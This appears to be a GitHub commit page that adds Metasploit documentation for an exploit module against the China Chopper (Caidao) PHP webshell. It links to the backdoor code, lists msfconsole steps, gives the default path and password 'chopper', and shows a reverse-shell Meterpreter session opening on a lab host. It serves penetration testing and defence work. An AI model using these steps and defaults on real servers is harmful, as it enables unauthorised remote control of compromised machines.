Skip to content

Commit 0832833

Browse files
committed
Land rapid7#7222, Add KB for multi/http/caidao_php_backdoor_exec
2 parents f2eb4b8 + 0b73786 commit 0832833

File tree

1 file changed

+44
-0
lines changed

1 file changed

+44
-0
lines changed
Lines changed: 44 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,44 @@
1+
China Chopper Caidao PHP Backdoor or simply [Chinese Caidao](https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html) is a webshell manager coded in PHP.
2+
3+
## Vulnerable Application
4+
5+
Here is the [PHP code](https://github.com/rapid7/metasploit-framework/files/430643/caidao.zip) of the backdoor that you can use and save it as caidao.php.
6+
7+
## Verification Steps
8+
9+
1. Install the application
10+
2. Start msfconsole
11+
3. Do: `use exploit/multi/http/caidao_php_backdoor_exec`
12+
4. Do: `set rport port`
13+
5. Do: `set rhost ip`
14+
6. Do: `check`
15+
```
16+
[+] 192.168.1.103:80 - The target is vulnerable.
17+
```
18+
8. Do: `exploit`
19+
9. You should get a shell.
20+
21+
## Options
22+
23+
**TARGETURI**
24+
25+
TARGETURI by default is `/caidao.php`, which is the common filename of the backdoor.
26+
27+
**PASSWORD**
28+
29+
PASSWORD by default is `chopper`, which is the password of the backdoor.
30+
31+
## Demonstration
32+
33+
```
34+
msf exploit(caidao_php_backdoor_exec) > exploit
35+
36+
[*] Started reverse handler on 192.168.1.108:4444
37+
[*] Sending stage (33068 bytes) to 192.168.1.103
38+
[*] Meterpreter session 2 opened (192.168.1.108:4444 -> 192.168.1.103:42349) at 2015-11-02 09:05:54 +0000
39+
40+
meterpreter > sysinfo
41+
Computer : kali
42+
OS : Linux kali 3.14-kali1-686-pae #1 SMP Debian 3.14.5-1kali1 (2014-06-07) i686
43+
Meterpreter : php/php
44+
```

0 commit comments

Comments
 (0)